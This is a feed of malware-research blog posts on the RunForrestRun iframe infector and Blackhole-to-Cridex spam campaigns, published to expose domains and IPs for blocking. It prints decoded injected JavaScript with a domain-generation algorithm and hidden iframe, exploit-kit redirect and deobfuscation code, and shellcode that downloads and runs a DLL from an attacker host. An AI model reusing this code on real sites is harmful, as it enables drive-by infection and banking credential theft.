Quantcast
Channel: Malware Must Die!
Viewing all 149 articles
Browse latest View live

JS/RunForrestRun Infector ComeBack! Full Disclosure of Decoding URL, DGA Domain List, Registrar & DNS info.

$
0
0

Today I will fully disclose the new PseudoRandom Domain / DGA of Infector
JS/RunForrestRun we caught just soppted "come-back" in action.

It was started by hundreds infection found via spam emails linked url to:
//case -1-
h00p://www.osmanoguz.net/?p=422
h00p://www.osmanoguz.net/afferim-nan-sana-google.html
h00p://www.osmanoguz.net/artik-buralardayim-be-google.html
h00p://www.osmanoguz.net/ay-lav-yu-full-izle.html
h00p://www.osmanoguz.net/?p=1677
h00p://www.osmanoguz.net/2009un-en-kotu-oyunlari.html
h00p://www.osmanoguz.net/?p=2530
h00p://www.osmanoguz.net/?p=1821
h00p://www.osmanoguz.net/?p=1829
h00p://www.osmanoguz.net/?p=2477
:

//case -2-
h00p://www.fotoajanda.com/?amp;album=140&id=3375&kategori=8&p=album
h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
h00p://fotoajanda.com/?album=25
h00p://fotoajanda.com/?album=68
h00p://fotoajanda.com/?album=89
h00p://www.fotoajanda.com/?p=album&kategori=8&album=66&id=1777
h00p://www.fotoajanda.com/?p=album&kategori=8&album=140&id=3375
h00p://fotoajanda.com/?amp;album=3&id=22/&kategori=5&p=album
:
We reported the osmanoguz.net right away and received cleanup response right away (thumbs up!) But the infections using fotoajanda.com is still ACTIVE, UP & ALIVE, as - per shown below in download PoC:
--13:58:37--  h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
Resolving www.fotoajanda.com... 89.107.228.218
Connecting to www.fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25,838 (25K) [text/html]
13:58:39 (26.68 KB/s) - `./sample2.txt' saved [25838/25838]

--14:00:17-- h00p://fotoajanda.com/?album=25
Resolving fotoajanda.com... 89.107.228.218
Connecting to fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75,063 (73K) [text/html]
14:00:20 (45.54 KB/s) - `./sample3.txt' saved [75063/75063]
The web server info itself can be viewed by the below header request:
GET /?amp;album=140&id=3375&kategori=8&p=album HTTP/1.0
User-Agent: Get well soon Razor! I'm banging this infector for your health!
Accept: */*
Host: www.fotoajanda.com
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Dec 2012 04:43:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14
X-Powered-By: PleskLin
Content-Length: 25838
---response end---
200 OK
Length: 25,838 (25K) [text/html]
13:43:47 (26.19 KB/s) - `./sample' saved [25838/25838]
FINISHED --13:43:47--
Downloaded: 25,838 bytes in 1 files
And I guess it doesn't look clean IP/site for me. At this point I looked the IP used in this infector domain - which is 89.107.228.218 & surprised by many malicious domains queried - via this IP as per below:
fotoajanda.com          A  89.107.228.218
armonipiyanodersi.com A 89.107.228.218
www.radyopop.com A 89.107.228.218
dorukuzgur.com A 89.107.228.218
datants.com A 89.107.228.218
thierrydiniz.com A 89.107.228.218
ozge.net A 89.107.228.218
www.ozge.net A 89.107.228.218
demle.net A 89.107.228.218
yayindayiz.biz A 89.107.228.218
Some of the malicious domains using www subdomain as CNAME:
www.fotoajanda.com        CNAME  fotoajanda.com
www.armonipiyanodersi.com CNAME armonipiyanodersi.com
www.dorukuzgur.com CNAME dorukuzgur.com
www.datants.com CNAME datants.com
www.yayindayiz.biz CNAME yayindayiz.biz
Same IP also being used to serve as DNS of malicious domains below:
ns1.trserver.com   A  89.107.228.218
ns.yayindayiz.biz A 89.107.228.218
ns.dorukuzgur.com A 89.107.228.218
In the downloaded data you'll see the injected malcode in - every end of file as per snipped below:
<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114..
41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117..
34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,..
112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100..
:
,53,52,93,59,118,61,34,101,118,97,34,59,125,105,1
14,61,83,116,114,105,110,103,59,122,61,40,40,101,
61,49,41,123,106,61,105,59,105,102,40,101,41,115,
7,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,
101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>
Which suggesting a format of obfuscated JS/RunForrestRun infector. This obfs'ed code can be easily decoded to find the - PseudoRandom Domain / DGA used by this infection as per below "hexed" code:
function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
} return (this.seed * this.oneOverM); }

function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this; }

function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min); }

function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
var str = '';
for(var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
} return str + '.' + zone;}

setTimeout(function(){
try{
if(typeof iframeWasCreated == "undefined"){
iframeWasCreated = true;
var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "h00p://"+domainName+"/runforestrun?sid=botnet2");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
} }catch(e){} }, 500)
The code above will resulted in .RU domains difined by the date to formulate - the url infector as per below structure:
http://****.ru/runforestrun?sid=botnet2
To crack or burps the domains used by this DGA is really easy :-) Just change the setTimeout function()try's code into the below, (by switching the year of 2012 & 2013)
//nextday.setFullYear(2012);
nextday.setFullYear(2013);
for (var yyy=0;yyy { nextday.setMonth(yyy);
for (var xxx= 1;xxx {
var unix = Math.round(nextday.setDate(xxx)/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
document.write(xxx+" | "+domainName+ " | "+nextday+"\n"); }}
[IMPORTANT!]It will generated the domains aimed for this infection as per listed in the pastebin here --->>[PASTEBIN]

Are these really to-be-in-use malware domains?

To check this theory is simple. If we can find that some of those domains are currently alive/registered, then we can confirm this theory. For checking almost 400 domains will not - be easy, that's why I uploaded the script/tools for this purpose in our - Google Project Download Page here --->>[MMD Google Project] The check result burped some domains currently UP & ALIVE, PoC↓
  :
bhigmqckbqhleqlo.ru,91.233.244.102, // Wed Nov 06 2013 15:50:08 GMT+0900
nsjosicxuhpidhlp.ru,91.233.244.102, // Thu Nov 07 2013 15:50:08 GMT+0900
:
So are the urls download page for this infection up? If the url ia also up, it will not returning 404, then PoC is proved↓
--16:29:50--  h00p://bhigmqckbqhleqlo.ru/runforestrun?sid=botnet2
Resolving bhigmqckbqhleqlo.ru... 91.233.244.102
Connecting to bhigmqckbqhleqlo.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK

--16:31:03-- h00p://nsjosicxuhpidhlp.ru/runforestrun?sid=botnet2
Resolving nsjosicxuhpidhlp.ru... 91.233.244.102
Connecting to nsjosicxuhpidhlp.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK
↑Yep! both HOST & URL are UP and ALIVE! The current case's DGA domain infector list theory is proven!

What internet service /ISP/DNS are these badactors using?

So let's look it up...
bhigmqckbqhleqlo.ru.  3600  IN   SOA   dns1.webdrive.ru. admin.webdrive.ru. 1354094642 10800 3600 604800 3600
nsjosicxuhpidhlp.ru. 3600 IN SOA dns1.webdrive.ru. admin.webdrive.ru. 1354095124 10800 3600 604800 3600

bhigmqckbqhleqlo.ru. 3600 IN A 91.233.244.102
bhigmqckbqhleqlo.ru. 3600 IN NS dns1.webdrive.ru.
bhigmqckbqhleqlo.ru. 3600 IN NS dns2.webdrive.ru.

nsjosicxuhpidhlp.ru. 3382 IN A 91.233.244.102
nsjosicxuhpidhlp.ru. 3381 IN NS dns2.webdrive.ru.

dns1.webdrive.ru. 1991 IN A 176.74.216.129
dns2.webdrive.ru. 1990 IN A 159.253.133.210
So they are using WEBDRIVE.RU Registration for Domains, interesting! Following this case, we will see OTHER malware domains in the same base IP:

donotwantyou787.ru A 91.233.244.102
nsjosicxuhpidhlp.ru A 91.233.244.102
Cool, we have more evil domains. It is indeed nteresting! Furthermore, I doubt below DNS servers are used for ONLY good domains.. I bet there are EVIL DNS domains registered insides..
ns1.unitedplatform.com  A  176.74.216.129
ns1.daodomains.com A 176.74.216.129
ns1.regway.com A 176.74.216.129
n1.reg3.ru A 176.74.216.129
ns1.nic-online.ru A 176.74.216.129
dns1.webdrive.ru A 176.74.216.129
ns1.getdomen.ru A 176.74.216.129
ns1.yoursdomain.ru A 176.74.216.129
dc1.nserver.ru A 176.74.216.129
ns1.donax.ru A 176.74.216.129

ns2.unitedplatform.com A 159.253.133.210
ns2.daodomains.com A 159.253.133.210
ns2.regway.com A 159.253.133.210
n2.reg3.ru A 159.253.133.210
ns2.nic-online.ru A 159.253.133.210
dns2.webdrive.ru A 159.253.133.210
ns2.getdomen.ru A 159.253.133.210
dc2.nserver.ru A 159.253.133.210
ns2.donax.ru A 159.253.133.210

How bad the "Come-Back" infection of RunforrestRun?

Well, at least you'll find the below urls are infected by the same obfuscated infector Javascript code:
// New Infection of PseudoRandom(DGA) RunForrestRun
// December 9th - 11th, 2012
h00p://adamlambrechtfamily.info/user.php?PHPSESSID=e9of24684l4e69b2vi05f1r3k7&xoops_redirect=%2Fmodules%2Fmydownloads%2Fsubmit.php
h00p://adamlambrechtfamily.info/modules/content/index.php?id=0
h00p://adamlambrechtfamily.info/user.php?PHPSESSID=cfe8ukkcnp5tam437p81bl7s43&xoops_redirect=%2Fmodules%2Fmydownloads%2Fsubmit.php
h00p://www.janessafari.com/index.php/page/3/
h00p://www.janessafari.com/index.php/2009/11/
h00p://rouen-saint-valentin.com/
h00p://rouen-saint-valentin.com/index.php?menu_mnemo=menu_news
h00p://gopeyup.com/js/kategoriler.js
h00p://www.directoames.com/2009/06
h00p://www.nowax.co.uk/wordpress_nowax/wp-content/themes/3k2/js/slider.js.php
h00p://www.armonipiyanodersi.com/page/2
h00p://www.unic.ae/
h00p://www.armonipiyanodersi.com/2010/08/11
h00p://giaohoi.net/
h00p://alacatiayakkabi.com/iletisim.html
h00p://www.isaanmassage.com/thai-language-version/trackback
h00p://www.calendarigadget.it/wp-content/plugins/shutter-reloaded/shutter-reloaded.js
h00p://www.shivalikenterprise.com/js/jquery.min.js
h00p://www.pssrijan.com/js/marquee.js
h00p://www.economics4development.com/economic_development_theories.htm
h00p://www.directoames.com/2010/12
h00p://www.jasonslog.com/
h00p://allmovingboxes.com/index.php?cpath=23
:
:
and many more before 9th of Dec, 2012.
*) The infection reports were sent..

The moral of this post is...

Friends, you will do a very good deed to our internet service if you just BLOCK every Domains, IP Addresses & DNS info reported in this post. We took effort to proof this theory, through some rechecks before exposal.

#MalwareMustDie


Update: The BHEK Users of Trojan Password Stealer BadActors is Shifting Their Evil Service into Germany VPS at AS25074 (SECURENETZ-DE)

$
0
0

We our past three incident Spam to BlackHole(BHEK) Trojan Cridex (see below url's posts)

Was conducted by a CyberCrime Group with the evil DNS service exposed below:

We just spotted these criminals are continuing infection & moving their
Blackhole2 Infector service into the Germany VPS: SECURENETZ-DE ,
as per details below: [PLEASE BLACKLIST THESE!]
ganiopatia.ru A 212.162.52.180
pelamutrika.ru A 212.162.52.180
aliamognoa.ru A 212.162.52.180
ahiontota.ru A 212.162.52.180
anifkailood.ru A 212.162.52.180
genevaonline.ru A 212.162.52.180
podarunoki.ru A 212.162.52.180
aseniakrol.ru A 212.162.52.180
pitoniamason.ru A 212.162.52.180
dimarikanko.ru A 212.162.52.180

ganiopatia.ru A 212.162.56.210
pelamutrika.ru A 212.162.56.210
aliamognoa.ru A 212.162.56.210
ahiontota.ru A 212.162.56.210
anifkailood.ru A 212.162.56.210
genevaonline.ru A 212.162.56.210
podarunoki.ru A 212.162.56.210
aseniakrol.ru A 212.162.56.210
pitoniamason.ru A 212.162.56.210
dimarikanko.ru A 212.162.56.210

ahiontota.ru A 212.162.13.230 NEW DOMAINS in NEW VPS IP ADDRESS
anifkailood.ru A 212.162.13.230
podarunoki.ru A 212.162.13.230
aseniakrol.ru A 212.162.13.230
pitoniamason.ru A 212.162.13.230
amnaosogo.ru A 212.162.13.230
dimarikanko.ru A 212.162.13.230
aofngppahgor.ru A 212.162.13.230 ←NEW DOMAIN [aofngppahgor.ru]

With the below WHOIS details:

inetnum: 212.162.56.0 - 212.162.57.255
netname: SECURENETZ-DE
descr: Secure-Netz
country: de
admin-c: NK1733-RIPE
tech-c: MATT69-RIPE
status: ASSIGNED PA
remarks: all abuse reports to abuse@level3.com
mnt-by: LEVEL3-MNT
mnt-lower: LEVEL3-MNT
source: RIPE # Filtered

person: Matthew Duncalf
address: Level (3) Communications
address: Level 3 House
address: 66 Prescot Street
address: London, E1 8HG UK
phone: +44 20 7961 8468
fax-no: +44 20 7864 0338
nic-hdl: MATT69-RIPE
mnt-by: LEVEL3-MNT
source: RIPE # Filtered

person: Nicole Kuehne
address: Secure-Netz
address: Am Plan 1
address: 37581 Bad Gandersheim
address: Germany
phone: +49 5382 953600
fax-no: +49 5382 953610
nic-hdl: NK1733-RIPE
mnt-by: LEVEL3-MNT
source: RIPE # Filtered
Conrad of Dynamoo blog is also have same reference of these new service (grep IP of 212.162.*) -->>[HERE]

Spam Infector Redirection URL List

Below is the PoC by the spam emails infected url infector landing pages:
h00p://www.jiaenhospital.com/mail.htm h00p://www.brsams.com/mail.htm h00p://sat-tesero.it/mail.htm h00p://mondoimmobiliare2010.com/mail.htm h00p://www.fevaweb.org.ar/mail.htm h00p://www.sddongrun.com/mail.htm h00p://revolverresine.com/mail.htm h00p://www.freemusicdownloads.eu/mail.htm h00p://www.migar.cn/mail.htm h00p://www.sp3zory.webd.pl/mail.htm h00p://www.vyborpodarka.ru/mail.htm h00p://latinchat.ca/mail.htm h00p://www.templodoaprendiz.com.br/mail.htm h00p://haxlzxs.com/mail.htm h00p://azlj365.com/mail.htm h00p://modaencuba.com/mail.htm h00p://naohide.com/mail.htm h00p://ulbakompleks.kz/mail.htm h00p://www.freelink.com.cn/mail.htm h00p://www.appchat.cn/mail.htm h00p://www.abbeyhealthcare.co.uk/mail.htm h00p://www.kaizer.cn/mail.htm h00p://www.lkedu8.com/mail.htm h00p://www.institutogv.com.ar/mail.htm h00p://mekka-digital.hu/mail.htm :
Log:
$ date
Wed Dec 12 20:00:40 JST 2012

$ Xurl h00p://www.jiaenhospital.com/mail.htm|less
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 422 100 422 0 0 88 0 0:00:04 0:00:04 --:--:-- 133
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aseniakrol.ru:8080/forum/links/column.php";}
</script>

</body>
</html>

$ host -ta aseniakrol.ru
aseniakrol.ru has address 212.162.52.180
aseniakrol.ru has address 212.162.56.210
.
I hope the authority will shutdown their domains & DNS soon, for these criminals - are VERY eager to steal credentials from innocent in daily basis. For the Secure-Netz,De, please help to shutdown the usage of these domains under - your VPS immediately.

#MalwareMustDie

"More" Spam to BHEK to Cridex; How they define, grab, handle & send the credentials + more things that we really (don't) need to know...

$
0
0

*)Sorry friends, I wrote and did everything non-stop 12hrs, so please bear -
with my bad grammar since my brain looks starting to jam..

This post is a wellknown bad actors that I always wrote,
I got many hints from everywhere (thank's @Hulk_Crusader, Dynamoo, + etc) that -
today's spam malvertisement has the direct link to the

h00p://myadmin.sp-host.ru/page4.htm

..or went to the the hacked wordpress like the below pic:

after click to the marked link above user will be redirected to the
h00p://myadmin.sp-host.ru/page4.htm

What's inside is this HTML redirected code...
<pre class="brush: html">$ Xurl h00p://myadmin.sp-host.ru/page4.htm
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://aviaonlolsio.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
...to the BHEK2 landing page below contains the obfuscated JS/Code
h00p://aviaonlolsio.ru:8080/forum/links/column.php
Ignoring the HTML code, that landing page fuzzy code's structure is as per below:
//----------------------structure-------------------

// jar applet part.....
<applet archive="/forum/links/column.php?fubzjr=dgfxdx&vxsk=eauuz" code="hw">
<param name="val" value="Dyy3OjjVv8"/>
<param name="prime" value="Vto-t-i8twlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xt.b1fO6oO68O68O11RFebhvO6qO60O1hO11O6qO6qO16O6CO6tR0b6.RSUbARMUb3" />
</applet>
<div></div>

// first part of the script...
dd="i";
if(document.getElementsByTagName("div")[0].style.left==="")
{ss=String.fromCharCode;}
pp="eIn";

// scattered deobfs'd data under tag <i> from var 0,1,..,29
<i
0="-0kjh4k3-05ke5j2..."
1=
:
:
29="-7i1kjhk-9k3g38f..."


// second part of the script....
if(document.getElementsByTagName("d"+"iv")[0].style.left===""){a=document["getElementsB"+"yTagName"](dd);
a=a[0];
s=new String();
for(i=0;;i++){
r=a.getAttribute(i);
if(r){s=s+r;}else break;}
a=s;
s=new String();
e=window["eva"+"l"];
p=parseInt;
for(i=0;a.length>i;i+=2){
if(a.substr(i,1)=="-")i+=2;
if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));}
c=s;
e(c)}
//-----------------------end of structure----------
Remember to always make things simple :-) Start joining the scattered/deobfs'ed vars...
 dd="i";
pp="eIn";
if(document.getElementsByTagName("div")[0].style.left==="")
{
ss=String.fromCharCode;
}
if(document.getElementsByTagName("div")[0].style.left==="")
{
a=document["getElementsByTagName"](dd);
a=a[0];
s=new String();
for(i=0;;i++)
{
r=a.getAttribute(i);
if(r)
{
s=s+r;
}
else break;
}
a=s;
s=new String();
p=parseInt;
for(i=0;a.length>i;i+=2)
{
if(a.substr(i,1)=="-")i+=2;
if(window.document)s=s+(ss((p(a["substr"](i,2),23)-7)/4));
}
c=s;
eval(c)
}
And pumped in the i tag values as per it is & runs it in your Rhino or SpiderMonket (Java Engines/Emulator) to get the - Plugin Detect here --->>[PASTEBIN] Straight to the point, let's crack the shellcode parts, see - the function getShellCode() part, and change the function into below - usual drill:
var a = "8200!%8582!%2551!%e0c4!%51f4!%1525!%34e0!%5191!%e054!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%95d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%74e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%14
:
:
!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e90!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
x= a["replace"](/\%!/g, "%" + "u");
document.write(x);
↑Run it & your'll get the shellcode after stripping the "%u" strings of the run's result..
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 09 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
: : :
58 40 58 17 47 4e 15 1b 18 12 19 46 12 19 41 12 X@X.GN.....F..A.
19 41 12 1b 1b 0e 59 4d 15 1a 5e 12 19 43 12 19 .A....YM..^..C..
45 12 1b 1a 12 1b 1b 12 19 43 12 19 43 12 1b 19 E........C..C...
12 19 42 12 19 47 0e 45 15 19 43 0e 51 52 15 4f ..B..G.E..C.QR.O
0e 4c 52 15 58 28 28 00 .LR.X((.
looks like the payload url is not seen if we don't dis-assembly this, so let's dis-assembly it (use many shellcode analyzer tools you prefer)
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
So we got the payload url here:
h00p://aviaonlolsio.ru:8080/forum/links/column.php?of=30:1n:1i:1i:33&qe=2v:1k:1m:32:33:1k:1k:31:1j:1o&m=1k&yz=g&dz=p
This time I just runs it in my test PC browser & download & plays with it. To have downloads with the varied names like pics below: *) If you would like to grab it with saver mode see previous posts pls. All of them is actually same files:
about.exe     06c032711f0cfae2c443b3926253b296
contacts.exe 06c032711f0cfae2c443b3926253b296
info.exe 06c032711f0cfae2c443b3926253b296
readme.exe 06c032711f0cfae2c443b3926253b296

A quick binary analysis

Shortly, like usual, is a Cridex, trojan password stealer. Let's see peek the PE info's (not much info though)
$ ls -alF ./sample
-rwx------ 1 xxxx xxxx 120320 Dec 14 09:38 ./sample*

// hex
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 08 00 8C 32 CB 50 00 00 00 00 PE..L....2.P....
0090 00 00 00 00 E0 00 0F 03 0B 01 06 09 00 24 00 00 .............$..
00A0 00 60 00 00 00 02 00 00 40 12 00 00 00 10 00 00 .`......@.......
00B0 00 40 00 00 00 00 40 00 00 10 00 00 00 02 00 00 .@....@.........
00C0 04 00 00 00 05 00 04 00 04 00 00 00 00 00 00 00 ................
00D0 00 30 02 00 00 04 00 00 12 A2 00 00 02 00 00 00 .0..............
: : :
// disassembly 1st block...
0x401240 mov ebp esp
0x401241 sub esp 0x8
0x401243 mov [esp] 0x2
0x401246 call [0x40912c]
0x40124d call 0x401100L
0x401253 nop
0x401258 lea esi [esi+0x0]
0x401259 push ebp
0x401260 mov ecx [0x409164]
0x401261 mov ebp esp
0x401267 pop ebp
0x401269 jmp ecx
: : :
//PE Analysis:
MD5: 06c032711f0cfae2c443b3926253b296
SHA-1: 0f129c1e331c3cf08eec5461a3e1d54e7f40932a
File Size: 120,320 Bytes
Image Base : 0x400000
Entry Point: 0x1000
Sections:
.text 0x1000 0x238c 9216 .data 0x4000 0x10e0 4608
.rdata 0x6000 0x1920 6656
.bss 0x8000 0x200 0
.idata 0x9000 0x3fc 1024
.rsrc 0xa000 0xbc4 3072
DATA 0xb000 0x17000 94208 DATA 0x22000 0x1000 512

//Suspicious Points:
CRC Failed: Claimed: 41490 Actual: 181202
Compiled Time: 0x50CB328C [Fri Dec 14 14:07:08 2012 UTC] // freshies! :-))
Packer: MinGW GCC 3.x
// loaded DLLs:
ntdll.dl 0x7C900000 0x000AF000
kernel32.dl 0x7C800000 0x000F6000
msvcrt.dll 0x77C10000 0x00058000

// The traces of calls that are "readable":
KERNEL32.dll.AddAtomA Hint[1]
KERNEL32.dll.ExitProcess Hint[155]
KERNEL32.dll.FindAtomA Hint[175]
KERNEL32.dll.GetAtomNameA Hint[220]
KERNEL32.dll.GetModuleHandleA Hint[335]
KERNEL32.dll.SetUnhandledExceptionFilter Hint[735]

So what happened if we run this malware? (summary)

I'll make it short and simple, is a Cridex..
it drops junks to %Temp% (like exp*.tmp) +also %AppData% & self deleted - and then execute CMD to exec %AppData%\KB00085031.exe" (after being self-copied/dropped)
These processes was kicked off by KB00085031.exe
ctfmon.exe // with code injection into other processes
svchost.exe

Network Analysis

For the network traffic, it does exactly as per - described in previous post here--->[PrevPost]I'm sorry friends, there's nothing new in it.

(Main Course) How the stolen information grabbed & sent..

I will describe a shocky facts that I frannkly just realized, After being advised by Blake (with thank's!), author of legendary tool Jsunpack, let me try to explain as per below: The incoming data which looks like binary which was encyrpted was - actually decoded by the malware itself and saved it as binary in a registry key <==POINT! In this case the key is at:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows NT\[random]\
And is ahving the value of below strings:
3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22 
34 39 64 63 38 39 66 30 36 38 65 38 63 36 32 65
35 35 39 33 31 32 65 31 66 63 32 30 33 66 38 39
62 66 64 39 65 38 38 36 22 3E 3C 68 74 74 70 73
:
snipped
Copy & paste this code in binary editor you'll get view below: OK, is a TEXT. So let's save it as text file to view it well... Snipped below:
<settings hash="49dc89f068e8c62e559312e1fc203f89bfd9e886"><httpshots..
/(html|plain)">/bb/logon/</url><url contentType="^text/(html|plain)">..
ccm/</url><url contentType="^text/(html|plain)">/cmmain\.cfm</url><ur..
="^text/(html|plain)">/ebc_ebc1961/</url><url contentType="^text/(htm..
entType="^text/(html|plain)">/livewire/</url><url contentType="^text/..
ser/</url><url contentType="^text/(html|plain)">/smallbiz/</url><url..
in)">2checkout\.com</url><url contentType="^text/(html|plain)">ablv\...
ain)">accountoverview\.aspx</url><url contentType="^text/(html|plain)..
pe="^text/(html|plain)">achworks\.com</url><url contentType="^text/(h..
com</url><url contentType="^text/(html|plain)">atbonlinebusiness\.com..
">baltikums\.eu</url><url contentType="^text/(html|plain)">banesco\.c..
banking\.firsttennessee\.biz</url><url contentType="^text/(html|plain..
^text/(html|plain)">business\.swedbank\.lv</url><url contentType="^te..
: : :
You can see the beautiful format of raw one here --->>[PASTEBIN]

What is this?

This is the configuration file of the Trojan stealer itself. In this data was defined well, what to fetch, where to fetch, how to send, where to send, how to fraud, how to encrypt the data, etc. I'll make some example below: It defined https saved data of banking/cashing online sites, & how to- fetch the patch contains the credentials' handle config:
https://(www\.|)cashanalyzer\.com/
https://(www\.|)enternetbank\.com/
https://(www\.|)nashvillecitizensbank\.com/
https://.*citizensbank\.com/
https://.+\.firsttennessee\.com/
https://.*firstcitizens\.com/
https://(bolb\-(west|east)|www)\.associatedbank\.com/
https://.*secure\.fundsxpress\.com/
https://usgateway\d*\.rbs\.com/
https://(www\.|)svbconnect\.com/
https?://(www\d*\.|)(ntrs|northerntrust)\.com/
https://cib\.bankofthewest\.com/
https://.+\.unionbank\.com/
https://webbankingforbusiness\.mandtbank\.com/
https://ifxmanager\.bnymellon\.com/
https://(ecash\.|.+/cashman/)
https://alphabank\.com
https://banking\.calbanktrust\.com/
https://(www\.|)efirstbank\.com/
https://singlepoint\.usbank\.com/
https://business-eb\.ibanking-services\.com/
https://www8\.comerica\.com/
https://.+\.53\.com/
https://businessonline\.tdbank\.com/
https://.+\.jpmorgan\.com/
https://(www\.|)cashanalyzer\.com/
https://business-eb\.ibanking-services\.com/
https://businessonline\.tdbank\.com
https://.+.tdcommercialbanking\.com/
